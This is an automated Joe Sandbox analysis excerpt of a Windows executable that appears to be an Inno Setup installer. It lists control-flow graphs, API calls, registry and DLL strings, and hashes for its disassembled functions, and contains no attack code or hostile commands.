                                                    • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1027 491d44-491d78 call 403684 1030 491d7a-491d89 call 446f94 Sleep 1027->1030 1031 491d8e-491d9b call 403684 1027->1031 1036 49221e-492238 call 403420 1030->1036 1037 491dca-491dd7 call 403684 1031->1037 1038 491d9d-491dc0 call 446ff0 call 403738 FindWindowA call 447270 1031->1038 1046 491dd9-491e01 call 446ff0 call 403738 FindWindowA call 447270 1037->1046 1047 491e06-491e13 call 403684 1037->1047 1057 491dc5 1038->1057 1046->1036 1055 491e5c-491e69 call 403684 1047->1055 1056 491e15-491e57 call 446f94 * 4 SendMessageA call 447270 1047->1056 1065 491eb8-491ec5 call 403684 1055->1065 1066 491e6b-491eb3 call 446f94 * 4 PostMessageA call 4470c8 1055->1066 1056->1036 1057->1036 1074 491f14-491f21 call 403684 1065->1074 1075 491ec7-491f0f call 446f94 * 4 SendNotifyMessageA call 4470c8 1065->1075 1066->1036 1087 491f4e-491f5b call 403684 1074->1087 1088 491f23-491f49 call 446ff0 call 403738 RegisterClipboardFormatA call 447270 1074->1088 1075->1036 1102 491f5d-491f97 call 446f94 * 3 SendMessageA call 447270 1087->1102 1103 491f9c-491fa9 call 403684 1087->1103 1088->1036 1102->1036 1115 491fab-491feb call 446f94 * 3 PostMessageA call 4470c8 1103->1115 1116 491ff0-491ffd call 403684 1103->1116 1115->1036 1127 491fff-49203f call 446f94 * 3 SendNotifyMessageA call 4470c8 1116->1127 1128 492044-492051 call 403684 1116->1128 1127->1036 1138 492053-492071 call 446ff0 call 42e38c 1128->1138 1139 4920a6-4920b3 call 403684 1128->1139 1159 492083-492091 GetLastError call 447270 1138->1159 1160 492073-492081 call 447270 1138->1160 1150 49212d-49213a call 403684 1139->1150 1151 4920b5-4920e1 call 446ff0 call 403738 call 446f94 GetProcAddress 1139->1151 1165 49213c-49215d call 446f94 FreeLibrary call 4470c8 1150->1165 1166 492162-49216f call 403684 1150->1166 1184 49211d-492128 call 4470c8 1151->1184 1185 4920e3-492118 call 446f94 * 2 call 447270 call 4470c8 1151->1185 1171 492096-4920a1 call 447270 1159->1171 1160->1171 1165->1036 1177 492171-49218f call 446ff0 call 403738 CreateMutexA 1166->1177 1178 492194-4921a1 call 403684 1166->1178 1171->1036 1177->1036 1193 4921a3-4921d5 call 48c174 call 403574 call 403738 OemToCharBuffA call 48c18c 1178->1193 1194 4921d7-4921e4 call 403684 1178->1194 1184->1036 1185->1036 1193->1036 1203 49221a 1194->1203 1204 4921e6-492218 call 48c174 call 403574 call 403738 CharToOemBuffA call 48c18c 1194->1204 1203->1036 1204->1036
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                    • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FindSleepWindow
                                                    • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                    • API String ID: 3078808852-3310373309
                                                    • Opcode ID: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                    • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                    • Opcode Fuzzy Hash: 75f42c2bc3d671ddacef7ceddea1dce46e469a81ba41ac7012420b40329701a8
                                                    • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1589 483038-48305d GetModuleHandleA GetProcAddress 1590 48305f-483075 GetNativeSystemInfo GetProcAddress 1589->1590 1591 4830c4-4830c9 GetSystemInfo 1589->1591 1592 4830ce-4830d7 1590->1592 1593 483077-483082 GetCurrentProcess 1590->1593 1591->1592 1594 4830d9-4830dd 1592->1594 1595 4830e7-4830ee 1592->1595 1593->1592 1602 483084-483088 1593->1602 1596 4830df-4830e3 1594->1596 1597 4830f0-4830f7 1594->1597 1598 483109-48310e 1595->1598 1600 4830f9-483100 1596->1600 1601 4830e5-483102 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1603 48308a-483091 call 4526f0 1602->1603 1603->1592 1607 483093-4830a0 GetProcAddress 1603->1607 1607->1592 1608 4830a2-4830b9 GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 4830bb-4830c2 1608->1609 1609->1592
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                    • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                    • API String ID: 2230631259-2623177817
                                                    • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                    • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                    • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                    • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1615 468bb0-468be8 call 47bb50 1618 468bee-468bfe call 4788b8 1615->1618 1619 468dca-468de4 call 403420 1615->1619 1624 468c03-468c48 call 4078e4 call 403738 call 42de14 1618->1624 1630 468c4d-468c4f 1624->1630 1631 468c55-468c6a 1630->1631 1632 468dc0-468dc4 1630->1632 1633 468c7f-468c86 1631->1633 1634 468c6c-468c7a call 42dd44 1631->1634 1632->1619 1632->1624 1636 468cb3-468cba 1633->1636 1637 468c88-468caa call 42dd44 call 42dd5c 1633->1637 1634->1633 1639 468d13-468d1a 1636->1639 1640 468cbc-468ce1 call 42dd44 * 2 1636->1640 1637->1636 1656 468cac 1637->1656 1642 468d60-468d67 1639->1642 1643 468d1c-468d2e call 42dd44 1639->1643 1660 468ce3-468cec call 4314f0 1640->1660 1661 468cf1-468d03 call 42dd44 1640->1661 1645 468da2-468db8 RegCloseKey 1642->1645 1646 468d69-468d9d call 42dd44 * 3 1642->1646 1657 468d30-468d39 call 4314f0 1643->1657 1658 468d3e-468d50 call 42dd44 1643->1658 1646->1645 1656->1636 1657->1658 1658->1642 1668 468d52-468d5b call 4314f0 1658->1668 1660->1661 1661->1639 1672 468d05-468d0e call 4314f0 1661->1672 1668->1642 1672->1639
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                    Strings
                                                    • %s\%s_is1, xrefs: 00468C2D
                                                    • Inno Setup: Icon Group, xrefs: 00468C8E
                                                    • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                    • Inno Setup: Setup Type, xrefs: 00468CC2
                                                    • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                    • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                    • Inno Setup: No Icons, xrefs: 00468C9B
                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                    • Inno Setup: App Path, xrefs: 00468C72
                                                    • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                    • Inno Setup: Selected Components, xrefs: 00468CD2
                                                    • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                    • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                    • API String ID: 47109696-1093091907
                                                    • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                    • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                    • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                    • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1833 42386c-423876 1834 42399f-4239a3 1833->1834 1835 42387c-42389e call 41f3bc GetClassInfoA 1833->1835 1838 4238a0-4238b7 RegisterClassA 1835->1838 1839 4238cf-4238d8 GetSystemMetrics 1835->1839 1838->1839 1842 4238b9-4238ca call 408cac call 40311c 1838->1842 1840 4238da 1839->1840 1841 4238dd-4238e7 GetSystemMetrics 1839->1841 1840->1841 1843 4238e9 1841->1843 1844 4238ec-423948 call 403738 call 4062e8 call 403400 call 423644 SetWindowLongA 1841->1844 1842->1839 1843->1844 1856 423962-423990 GetSystemMenu DeleteMenu * 2 1844->1856 1857 42394a-42395d call 424170 SendMessageA 1844->1857 1856->1834 1858 423992-42399a DeleteMenu 1856->1858 1857->1856 1858->1834
                                                    APIs
                                                      • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                    • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                    • RegisterClassA.USER32(00499630), ref: 004238AF
                                                    • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                    • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                    • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                    • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                    • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                    • String ID: t6B
                                                    • API String ID: 183575631-3178735703
                                                    • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                    • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                    • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                    • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                    APIs
                                                    • GetProcAddress.KERNEL32(6FB40000,SHGetFolderPathA), ref: 0047C75E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                    • API String ID: 190572456-2091577475
                                                    • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                    • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                    • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                    • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                    • API String ID: 3256987805-3653653586
                                                    • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                    • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                    • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                    • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                    APIs
                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID: wA$yA
                                                    • API String ID: 3887896539-1847240991
                                                    • Opcode ID: 2258c6fae4e842138a62661f1ae73ee89d2f561e6d2e8f86b954473a9ad31587
                                                    • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                    • Opcode Fuzzy Hash: 2258c6fae4e842138a62661f1ae73ee89d2f561e6d2e8f86b954473a9ad31587
                                                    • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0042F587
                                                    • GetFocus.USER32 ref: 0042F58F
                                                    • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                    • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                    • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                    • String ID: TWindowDisabler-Window
                                                    • API String ID: 3167913817-1824977358
                                                    • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                    • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                    • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                    • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                    • API String ID: 1646373207-2130885113
                                                    • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                    • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                    • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                    • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                    APIs
                                                    • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                      • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                      • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                    • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
